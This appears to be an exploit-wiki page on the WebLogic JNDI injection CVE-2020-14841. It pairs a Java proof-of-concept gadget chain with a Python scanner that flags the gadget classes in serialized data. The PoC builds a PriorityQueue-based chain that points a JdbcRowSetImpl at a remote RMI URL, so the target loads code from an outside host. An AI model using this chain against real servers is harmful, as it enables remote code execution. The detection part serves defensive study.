CVE-2020-14841 WebLogic JNDI injection vulnerability

The free, open vulnerability database that anyone can edit -- PwnWiki.com

POC

        // JdbcRowSetImpl: its data source name is a JNDI name, here a remote RMI URL
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");

        // Accessor configured with getDatabaseMetaData as the getter it invokes reflectively
        MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
        methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
        methodAttributeAccessor.setIsWriteOnly(true);
        methodAttributeAccessor.setAttributeName("UnicodeSec");

        // Wrap the accessor in an extractor, and the extractor in a comparator
        LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");

        final ExtractorComparator comparator = new ExtractorComparator(extractor);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);

        // Fill the queue through reflection so that no comparison runs while the object is built
        Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
        Reflections.setFieldValue(queue, "queue", q);
        Reflections.setFieldValue(queue, "size", 2);

        // Set the comparator field through reflection as well
        Field comparatorF = queue.getClass().getDeclaredField("comparator");
        comparatorF.setAccessible(true);
        comparatorF.set(queue, new ExtractorComparator(extractor));
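
For detection, the four classes the PoC above wires together can be looked for in captured Java-serialized data. The following is an added example, not part of the original page or of any WebLogic tooling: a heuristic scanner that pulls class names out of class-descriptor records and reports the ones named in the PoC. Matching is on the simple class name only, and the sample streams and the `placeholder.pkg` package are constructed for illustration.

```python
import re
import struct

# Simple class names taken from the PoC on this page; matched as the last
# dotted component so that no package name has to be assumed.
GADGET_CLASSES = {"JdbcRowSetImpl", "MethodAttributeAccessor",
                  "LockVersionExtractor", "ExtractorComparator"}
TC_CLASSDESC = 0x72  # Java serialization tag that starts a class descriptor
_CLASS_NAME = re.compile(r"(?:[A-Za-z_$][\w$]*\.)*[A-Za-z_$][\w$]*")

def class_names(data: bytes):
    """Yield class names from TC_CLASSDESC records found anywhere in data."""
    i = 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3:i + 3 + n]
            # Record layout: 0x72, u2 name length, name, 8-byte serialVersionUID
            if 0 < n == len(raw) and i + 3 + n + 8 <= len(data):
                try:
                    name = raw.decode("ascii")
                except UnicodeDecodeError:
                    name = ""
                if _CLASS_NAME.fullmatch(name):
                    yield name
                    i += 3 + n + 8  # skip the record so its own 'r' bytes are not rescanned
                    continue
        i += 1

def gadget_hits(data: bytes):
    """Return the sorted class names in data whose simple name is in the PoC."""
    return sorted({n for n in class_names(data)
                   if n.rsplit(".", 1)[-1] in GADGET_CLASSES})

def _desc(name: str) -> bytes:
    """Constructed sample record: tag, length, name, zeroed serialVersionUID."""
    b = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(b)) + b + bytes(8)

# Constructed inputs (not captured traffic): stream magic, TC_OBJECT, descriptors.
SAMPLE = (b"\xac\xed\x00\x05\x73" + _desc("java.util.PriorityQueue") + b"\x03\x00\x01"
          + _desc("placeholder.pkg.ExtractorComparator")
          + _desc("com.sun.rowset.JdbcRowSetImpl"))
BENIGN = b"\xac\xed\x00\x05\x73" + _desc("java.util.ArrayList") + b"\x03\x00\x01"

if __name__ == "__main__":
    print("sample:", gadget_hits(SAMPLE))
    print("benign:", gadget_hits(BENIGN))
```

A hit is a lead for triage rather than proof of exploitation, since the scan only recognises the record shape and does not parse the full stream grammar.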
